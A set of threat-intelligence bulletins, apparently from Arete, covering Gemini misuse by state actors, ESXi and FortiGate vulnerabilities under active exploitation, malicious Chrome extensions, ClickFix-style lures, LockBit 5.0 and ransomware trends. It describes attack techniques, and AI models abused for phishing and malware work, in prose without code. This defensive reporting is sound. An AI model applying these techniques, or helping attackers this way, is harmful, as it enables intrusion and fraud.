State-backed threat actors are leveraging Google’s Gemini AI as a force multiplier to support all stages of the cyberattack lifecycle, from reconnaissance to post-compromise operations. According to the Google Threat Intelligence Group (GTIG), threat actors linked to the People’s Republic of China (PRC), Iran, North Korea, and other unattributed groups have misused Gemini to accelerate target profiling, synthesize open-source intelligence, identify official email addresses, map organizational structures, generate tailored phishing lures, translate content, conduct vulnerability testing, support coding tasks, and troubleshoot malware development. Cybercriminals are increasingly exploring AI-enabled tools and services to scale malicious activities, including social engineering campaigns such as ClickFix, demonstrating how generative AI is being integrated into both espionage and financially motivated threat operations. 

What’s Notable and Unique 

• Threat actors are leveraging Gemini beyond basic reconnaissance, using it to generate polished, culturally nuanced phishing lures and sustain convincing multi-turn social engineering conversations that minimize traditional red flags.  

• In addition, threat actors rely on Gemini for vulnerability research, malware debugging, code generation, command-and-control development, and technical troubleshooting, with PRC groups emphasizing automation and vulnerability analysis, Iranian actors focusing on social engineering and malware development, and North Korean actors prioritizing high-fidelity target profiling. 

• Beyond direct operational support, adversaries have abused public generative AI platforms to host deceptive ClickFix instructions, tricking users into pasting malicious commands that deliver macOS variants of ATOMIC Stealer.  

• AI is also being integrated directly into malware development workflows, as seen with CoinBait’s AI-assisted phishing kit capabilities and HonestCue’s use of the Gemini API to dynamically generate and execute in-memory C# payloads.  

• Underground forums show strong demand for AI-powered offensive tools, with offerings like Xanthorox falsely marketed as custom AI but actually built on third-party commercial models integrated through open-source frameworks such as Crush, Hexstrike AI, LibreChat-AI, and Open WebUI, including Gemini. 

Analyst Comments 

The increasing misuse of generative AI platforms like Gemini highlights a rapidly evolving threat landscape in which state-backed and financially motivated actors leverage AI as a force multiplier for reconnaissance, phishing, malware development, and post-compromise operations. At the same time, large-scale model extraction attempts and API abuse demonstrate emerging risks to AI service integrity, intellectual property, and the broader AI-as-a-Service ecosystem. While these developments underscore the scalability and sophistication of AI-enabled threats, continued enforcement actions, strengthened safeguards, and proactive security testing by providers reflect ongoing efforts to mitigate abuse and adapt defenses in response to increasingly AI-driven adversaries. 

Sources 

• GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use 

Ransomware groups are actively exploiting CVE‑2025‑22225, a VMware ESXi arbitrary write vulnerability that allows attackers to escape the VMX sandbox and gain kernel‑level access to the hypervisor. Although VMware (Broadcom) patched this flaw in March 2025, threat actors had already exploited it in the wild, and CISA recently confirmed that threat actors are exploiting CVE‑2025‑22225 in active campaigns.

What’s Notable and Unique

• Chinese‑speaking threat actors abused this vulnerability at least a year before disclosure, via a compromised SonicWall VPN chain. 

• Threat researchers have observed sophisticated exploit toolkits, possibly developed well before public disclosure, that chain this bug with others to achieve full VM escape. Evidence points to targeted activity, including exploitation via compromised VPN appliances and automated orchestrators.

• Attackers with VMX level privileges can trigger a kernel write, break out of the sandbox, and compromise the ESXi host. Intrusions observed in December 2025 showed lateral movement, domain admin abuse, firewall rule manipulation, and staging of data for exfiltration. 

• CISA has now added CVE-2025-22225 to its Known Exploited Vulnerabilities (KEV) catalog, underscoring ongoing use by ransomware attackers.

Analyst Comments

Compromise of ESXi hypervisors significantly amplifies operational impact, allowing access to and potential encryption of dozens of VMs simultaneously. Organizations running ESXi 7.x and 8.x remain at high risk if patches and mitigations have not been applied. Therefore, clients are recommended to apply VMware patches from VMSA‑2025‑0004 across all ESXi, Workstation, and Fusion deployments. Enterprises are advised to assess their setups in order to reduce risk, as protecting publicly accessible management interfaces is a fundamental security best practice.

Sources

• CVE-2025-22225 in VMware ESXi now used in active ransomware attacks

• The Great VM Escape: ESXi Exploitation in the Wild

• VMSA-205-004: VMware ESXi, Workstation, and Fusion updates address multiple vulnerabilities (CVE-205-22224, CVE-2025-22225, CVE-2025-22226)

Although Akira was once again the most active ransomware group in January, the threat landscape was more evenly distributed than it was throughout most of 2025. In December 2025, the three most active threat groups accounted for 57% of all ransomware and extortion activity; in January, the top three accounted for just 34%. Akira’s dominance also decreased to levels more consistent with early 2025, as the group was responsible for almost a third of all attacks in December but just 17% in January. 

The number of unique ransomware and extortion groups observed in January increased slightly, to 17, up from 14 in December. It is too early to assess whether this trend will be the new normal for 2026. It is also worth noting that overall activity in January was lower than in previous months, consistent with what Arete typically observes at the beginning of a new year.

Figure 1. Activity from all threat groups in January 2026

Throughout the month of January, analysts at Arete identified several distinct trends behind the threat actors perpetrating cybercrime activities: 

• In January, Arete observed the reemergence of the LockBit Ransomware-as-a-Service (RaaS) group, which deployed an updated “LockBit 5.0” variant of its ransomware. LockBit first announced the 5.0 version on the RAMP dark web forum in early September 2025, coinciding with the group’s six-year anniversary. The latest LockBit 5.0 variant has both Windows and Linux versions, with notable improvements, including anti-analysis features and unique 16-character extensions added to each encrypted file. However, it remains to be seen whether LockBit will return to consistent activity levels in 2026.

• The ClickFix social engineering technique, which leverages fake error dialog boxes to deceive users into manually executing malicious PowerShell commands, continued to evolve in unique ways in January. One campaign reported in January involved fake Blue Screen of Death (BSOD) messages manipulating users into pasting attacker-controlled code. During the month, researchers also documented a separate campaign, dubbed “CrashFix,” that uses a malicious Chrome browser extension-based attack vector. It crashes the web browser, displays a message stating the browser had "stopped abnormally," and then prompts the victim to click a button that executes malicious commands.

• Also in January, Fortinet confirmed that a new critical authentication vulnerability affecting its FortiGate devices is being actively exploited. The vulnerability, tracked as CVE-2026-24858, allows attackers with a FortiCloud account to log in to devices registered to other account owners due to an authentication bypass flaw in devices using FortiCloud single sign-on (SSO). This recent activity follows the exploitation of two other Fortinet SSO authentication flaws, CVE-2025-59718 and CVE-2025-59719, which were disclosed in December 2025.

Source

Arete Internal

Fortinet recently confirmed that its FortiGate devices are affected by a new critical authentication vulnerability that is being actively exploited. The vulnerability, tracked as CVE-2026-24858, allows attackers with a FortiCloud account to log in to devices registered to other account owners due to an authentication bypass flaw in devices using FortiCloud single sign-on (SSO). CISA added the vulnerability to its Known Exploited Vulnerabilities catalogue and gave federal agencies just three days to patch, which requires users to upgrade all devices running FortiOS, FortiManager, FortiAnalyzer, FortiProxy, and FortiWeb to fixed versions. This recent activity follows the exploitation of two other SSO authentication flaws, CVE-2025-59718 and CVE-2025-59719, which were disclosed last month.

What’s Notable and Unique

• There are strong indications that much of the recent exploitation activity was automated, with attackers moving from initial access to account creation within seconds.

• As observed in December 2025, the attackers’ primary target appears to be firewall configuration files, which contain a trove of information that can be leveraged in future operations.

• The threat actors in this campaign favor innocuous, IT-themed email and account names, with malicious login activity originating from cloud-init@mail[.]io and cloud-noc@mail[.]io, while account names such as ‘secadmin’, ‘itadmin’, ‘audit’, and others are created for persistence and subsequent activity.

Analyst Comments

This is an active campaign, and the investigation into these attacks is ongoing. Organizations relying on FortiGate devices should remain extremely vigilant, even after following patching guidance. With threat actors circumventing authentication, it’s crucial to monitor for and alert on anomalous behavior within your environment, such as the unauthorized creation of admin accounts, the creation or modification of access policies, logins outside normal working hours, and anything that deviates from your security baseline.

Sources

• Administrative FortiCloud SSO authentication bypass

• Multiple Fortinet Products’ FortiCloud SSO Login Authentication Bypass

• Arctic Wolf Observes Malicious Configuration Changes On Fortinet FortiGate Devices via SSO Accounts

• Arctic Wolf Observes Malicious SSO Logins on FortiGate Devices Following Disclosure of CVE-2025-59718 and CVE-2025-59719

Cyber Campfire delivers data-driven insights from Arete’s Threat Intelligence Team. In this episode, we discuss cyber threat trends, statistics, and emerging threat actors from December 2025. Tune in for an in-depth look at the evolving threat landscape and actionable insights for global organizations and security partners.

Recent research reveals two distinct but similar malicious Chrome browser extension campaigns that demonstrate how threat actors are increasingly abusing trusted browser extension ecosystems to gain initial access, steal sessions, and compromise enterprise environments.

What’s Notable and Unique

• In mid-January 2026, cybersecurity researchers uncovered a coordinated cluster of five malicious Chrome extensions masquerading as enterprise productivity or access management tools for popular Human Resource and Enterprise Resource Planning platforms such as Workday, NetSuite, and SAP SuccessFactors.

• Although published under different names, the extensions shared identical infrastructure, code patterns, and attack logic, indicating a single, well-organized operation. These extensions enabled session hijacking and full account takeover by abusing browser-level access.

• In January, researchers also documented a separate campaign, dubbed “CrashFix,” which uses a different but equally effective browser extension-based attack vector. In this case, a malicious Chrome extension named NexShield impersonated the legitimate uBlock Origin Lite ad blocker and was distributed through malicious ads that redirected users to the official Chrome Web Store where they would be prompted to download the malicious version.

• The technique mentioned above is yet another evolution of the ClickFix style social engineering that emerged in 2025, in which users are tricked into executing malicious commands themselves. In CrashFix attacks, following the instructions led to the execution of PowerShell commands that downloaded and installed ModeloRAT, a previously undocumented Python based remote access trojan.

Analyst Comments

Browser extensions are being weaponized as highly trusted initial access vectors, with attackers blending technical abuse (cookie theft, resource exhaustion) with social engineering (productivity branding, fake repair prompts). Together, these two recent findings demonstrate that malicious Chrome extensions pose a risk as a primary entry point for enterprise compromise, making browser extension governance, monitoring, and user education a critical defensive priority. Organizations should monitor for hidden PowerShell processes that are accessing browser cache folders and limit the use of PowerShell to privileged administrators. Organizations should also continue to promote and update their security awareness training, educating employees on newer social engineering techniques such as ClickFix.

Sources

• 5 Malicious Chrome Extensions Enable Session Hijacking in Enterprise HR and ERP Systems

• Dissecting CrashFix: KongTuke’s New Toy

The once-prolific LockBit group appears to have reemerged, recently deploying an updated “LockBit 5.0” variant of its ransomware. Although the Ransomware-as-a-Service (RaaS) group has been trying to reestablish its brand since international law enforcement disrupted the group’s infrastructure in early 2024, this latest effort appears to be a return to form.

LockBit first announced the 5.0 version on the RAMP dark web forum in early September 2025, coinciding with the group’s six-year anniversary. In early December 2025, the group posted an announcement on its old data leak site (DLS) with a link to its new Christmas-themed LockBit 5.0 DLS. Since then, the group has already posted over 100 alleged victims to the new DLS.

Figure 1. LockBit’s new “5.0” DLS (Source: Arete)

A Long History of LockBit Variants

According to researchers, the 5.0 variant has numerous code overlaps with the LockBit 4.0 variant and appears to be the latest in a series of evolving ransomware versions observed since the group first emerged in September 2019.

• In June 2021, LockBit released version 2.0, also known as LockBit Red, followed by a Linux version released in October 2021 that could be deployed on Linux and VMware ESXi systems.

• In March 2022, the group released version 3.0, which was also known as LockBit Black. The builder for this LockBit 3.0 variant was subsequently leaked by a disgruntled affiliate in June 2023. Since then, this leaked builder has been used by a number of unaffiliated threat actors, even after law enforcement’s disruption of the LockBit RaaS in 2024.

• Following the leak of the LockBit Black builder, the group released a LockBit Green version in January 2023, followed by a macOS version in April 2023.

• In February 2024, international law enforcement disrupted LockBit’s operations, seizing the group’s DLS along with numerous websites and servers used by LockBit administrators. In May 2024, international law enforcement revealed that Russian national Dmitry Yuryevich Khoroshev, who went by the alias LockBitSupp, was the developer and administrator of the LockBit RaaS. Khoroshev was sanctioned by the US Department of the Treasury’s Office of Foreign Assets Control (OFAC), the UK’s Foreign Commonwealth & Development Office (FCDO), and the Australian Department of Foreign Affairs.

• In December 2024, LockBit announced the release of LockBit 4.0, with the new version becoming available to affiliates in February 2025. However, the group remained quiet for most of 2025, and Arete never observed any incidents involving the 4.0 version during the year.

The latest LockBit 5.0 variant has both Windows and Linux versions, with notable improvements, including anti-analysis features and unique 16-character extensions added to each encrypted file. Ransom notes for the 5.0 version direct victims to Tor chat panels, similar to those the group used before law enforcement’s disruptions.
 

Analyst Comments

Despite the number of victims initially posted to the new DLS, it remains to be seen whether LockBit will return to consistent activity levels in 2026. With the group continuing to operate under the LockBit brand, the sanctions against Khoroshev should inhibit victims contemplating payment for LockBit 5.0 decryption keys, creating a substantial barrier to the group reclaiming its place as one of the top RaaS organizations. If the group becomes an increasingly active threat in 2026, the OFAC sanction implications make it exceedingly important for organizations to have adequate data protection and security practices in place to be able to recover from potential encryption and extortion attacks without payment.

The ClickFix social engineering technique has gained significant popularity across the threat landscape since it emerged in 2025. It leverages fake error dialog boxes to deceive users into manually executing malicious PowerShell commands. This technique is commonly delivered through compromised websites, malicious documents, HTML attachments, or phishing URLs, and has been associated with a wide range of malware families, including AsyncRAT, DarkGate, NetSupport, and Lumma Stealer.

More recently, threat researchers have identified a clever evolution of this technique targeting the hospitality sector. This campaign combines ClickFix lures with fake CAPTCHA prompts and counterfeit Blue Screen of Death (BSOD) messages to manipulate users into pasting attacker-controlled code. This approach enables defense evasion and ultimately results in the deployment of the Russian-linked DCRat malware.

Figure 1. Example of a fake BSOD used to trick victims (Source: Securonix)

What’s Notable and Unique

• This latest campaign leverages phishing emails impersonating Booking.com, using Euro-denominated reservation cancellation charges to create urgency and direct victims to fraudulent websites.

• These websites use fake CAPTCHA challenges and counterfeit BSOD messages as social engineering lures, targeting hospitality organizations, particularly European entities, during the peak holiday season.

• This social engineering technique ultimately deceives users into executing malicious code that abuses MSBuild.exe to deploy a Russian-linked DCRat payload, enabling persistent remote access, process hollowing, keylogging, and secondary payload delivery.

Analyst Comments

ClickFix social engineering techniques continue to evolve, with earlier-identified variants like FileFix using sophisticated methods that trick users into copying malicious scripts, which are then executed through Windows File Explorer. The latest campaign now employs fake BSOD prompts to deceive victims and deploy DCRat malware, underscoring the importance of vigilance against emerging social engineering threats. To defend against these attacks, organizations should provide ongoing employee training to recognize and respond to social engineering techniques, ensure software is downloaded only from trusted sources, and restrict PowerShell usage to privileged administrators.

Sources

• Analyzing PHALT#BLYX: How Fake BSODs and Trusted Build Tools Are Used to Construct a Malware Infection

• Think before you Click(Fix): Analyzing the ClickFix social engineering technique

Consistent with the second half of 2025, Akira continues to dominate the ransomware landscape. In December, the group was responsible for over a third of all ransomware and extortion engagements observed by Arete. Akira was also responsible for 10% more ransomware attacks than second and third most active groups, Qilin and INC Ransom, combined. Collectively, the top three most active threat groups in December comprised about 57% of all activity Arete observed during the month. 

Figure 1. Activity from the top 3 threat groups in December 2025

Throughout the month of December, analysts at Arete identified several distinct trends behind the threat actors perpetrating cybercrime activities: 

• In addition to Akira, Qilin, and INC, there has recently been an uptick in engagements attributed to RansomHouse, a group that Arete had not observed since early 2024. Reporting from December 2025 indicated that the group updated its encryption code to make it more efficient, which could partly explain the increase in RansomHouse engagements observed in November and December.

  
  

• In early December, a maximum-severity flaw was reported in the widely used JavaScript library React that allows unauthenticated remote attackers to execute malicious code on vulnerable instances. The vulnerability, tracked as CVE-2025-55182, also known as React2Shell, was assigned a maximum CVSS severity rating of 10.0, with an estimated 39% of cloud environments affected at the time the vulnerability was disclosed. Organizations should prioritize immediate patching to address the React2Shell (CVE-2025-55182) vulnerability and ensure all internet-facing applications are updated to the vendor-recommended versions.

  
  

• In late December 2025, a high-severity, pre-authentication memory vulnerability was disclosed that affects MongoDB versions 3.6 and later. Referred to as MongoBleed (CVE-2025-14847), the vulnerability enables unauthenticated attackers to send malformed network messages, thereby leaking uninitialized server memory that contains sensitive data, such as credentials, tokens, and API keys. While the flaw does not allow for remote code execution and no ransomware campaigns have been confirmed, researchers have linked it to real-world abuse, including a suspected Ubisoft Rainbow Six Siege backend compromise. Data leaked from these incidents could enable follow-on attacks, including ransomware. Organizations with publicly exposed MongoDB servers affected by the vulnerability should immediately patch to the latest version.

Sources

• Arete Internal